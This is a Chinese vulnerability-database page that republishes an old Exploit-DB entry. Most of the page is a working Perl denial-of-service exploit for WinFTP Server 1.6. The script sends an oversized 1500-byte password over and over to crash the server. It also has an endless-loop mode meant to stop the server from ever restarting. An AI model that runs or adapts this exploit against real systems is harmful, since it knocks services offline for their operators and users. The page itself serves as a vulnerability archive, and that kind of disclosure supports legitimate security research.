WinFTP Server 1.6 – Denial of Service

WinFTP Server 1.6 – Denial of Service

漏洞ID 1054746 漏洞类型
发布时间 2004-11-11 更新时间 2004-11-11
图片[1]-WinFTP Server 1.6 – Denial of Service-安全小百科CVE编号 N/A
图片[2]-WinFTP Server 1.6 – Denial of Service-安全小百科CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/625
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#!/usr/local/bin/perl -w

###########################################################
###########################################################
##     WinFTP server ver  1.6  D.o.S Exploit
##         Discovered,exploited by KaGra
##	Tested on WinXP SP1 English version
## 
## Sending 40 times a username and a buffer of 1500
## bytes as pass,will crash the server,as soon as is
## not minimized in Target computer.If he is minimized,he
## will crash as soon as he will stop be minimized.If U use
## this sploit in a loop without ending,server will be unable
## to restart,because he starts NOT minimized of course... 
## Except USER and PASS,almost all commands of ftp service are vuln...
############################################################
############################################################


use Net::FTP;

if(@ARGV<2)  
{
 print "#################  Winftp 6.0 D.o.S SploiT By KaGra  ###################n";
 print "#               Usage: perl agate.pl <target> <option>                 #n";  
 print "#   Option is 1 for non endless D.o.s,2 for endless D.o.s,use 1 first  #n";
 print "########################################################################nn";
 exit(0);
}

$hostname = $ARGV[0]; 		        #Remote Host to D.o.S!
$username = 'kagra'; 		        #AnythinG HeRe!

print "n[*]BuiLDinG BuFfer...n";

$password = 'A'x1500   ; 		#OverFlow BuffEr!
print "[*]ConnectinG To TarGet...n";




if($ARGV[1]==2)
{
print "[*]SenDing DeViL In EndLeSS Loop,Server Will be DEAD for eVer,just stop the process...n";
for($i=0; $i < 20; $i--)
{
XX:
$ftp = Net::FTP->new($hostname);        # Connecting...
if(!defined($ftp))
{
goto XX
}
$ftp->login($username, $password);      # Sending EviL BuffeR...
$ftp->quit;
}
exit(0);
}





for($i= 0; $i < 40; $i++)
{
$ftp = Net::FTP->new($hostname);        # Connecting...
if(!defined($ftp))
{
	print "Could not connect.If buffer has been send,then target D.o.Sed :-P.Use sploit in endless loop now,and will not restart again...n";
	sleep(1);
	exit(0);
}
print "[*]SenDing DeViL...n";
$ftp->login($username, $password);      # Sending EviL BuffeR...
$ftp->quit;
}
print "SerVer Has Been D.o.sed,will be Down if he is or will be stop being minimized!Use sploit in endless loop now,and when he will be down,will not restart again...n";


# milw0rm.com [2004-11-11]

相关推荐: Check Point Firewall-1 Session Agent Impersonation Vulnerability

Check Point Firewall-1 Session Agent Impersonation Vulnerability 漏洞ID 1104878 漏洞类型 Unknown 发布时间 1998-09-24 更新时间 1998-09-24 CVE编号 N…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享